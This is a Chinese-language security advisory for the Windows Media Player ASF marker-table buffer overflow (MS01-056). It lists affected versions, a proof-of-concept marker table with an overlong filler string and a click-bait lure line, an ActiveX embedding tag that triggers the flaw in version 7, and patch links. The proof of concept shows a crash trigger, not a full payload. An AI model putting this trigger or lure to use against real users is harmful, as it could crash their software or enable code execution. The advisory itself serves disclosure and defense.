Microsoft Windows媒体播放器.ASF文件标记缓冲区溢出漏洞(MS01-056)
发布日期:2001-08-07
更新日期:2001-11-21
受影响系统:
Microsoft Windows Media Player 6.4
Microsoft Windows Media Player 7
Microsoft Windows Media Player 7.1
- Microsoft Windows NT
- Microsoft Windows 2000
Windows Media Player for Windows XP
- Microsoft Windows XP
描述:
微软的媒体播放器在处理.ASF文件中的标记时没有进行有效的边界检查,如果攻击者设置
一个超长的标记,就有可能触发缓冲区溢出。攻击者可以通过发送邮件或者在网页上提供
恶意.ASF文件的方式来诱使受害者打开恶意文件,当受害者点击弹出来的菜单条时,媒体
播放器可能崩溃或者执行攻击者设定的任意代码。
<*来源:Pauli Ojanpera (
pauli_ojanpera@hotmail.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Pauli Ojanpera (
pauli_ojanpera@hotmail.com)提供了下列测试方法:
使用ASFCHOP.EXE程序在一个ASF文件中嵌入下列脚本语句:
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----
当用户点击菜单条时,媒体播放器将崩溃。
对于媒体播放器7,需要使用ActiveX控件来使其执行有问题的WMP模块:
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
<PARAM NAME="ShowControls" VALUE="-1">
<PARAM NAME="ShowGotoBar" VALUE="1">
<PARAM NAME="ShowStatusBar" VALUE="1">
<PARAM NAME="ControlType" VALUE="2">
<PARAM NAME="Filename" VALUE="a.asf">
<PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>
建议:
临时解决方法:
不要点击ASF文件中的菜单条。
厂商补丁:
微软已经为此发布了一个安全公告(MS01-056)以及相应补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-056.asp
补丁下载地址:
Windows Media Player 6.4、7或7.1:
http://download.microsoft.com/download/winmediaplayer/Update/308567/WIN98MeXP/EN-US/wm308567.exe
Windows Media Player for Windows XP:
http://windowsupdate.com浏览次数:4182
严重程度:0(网友投票)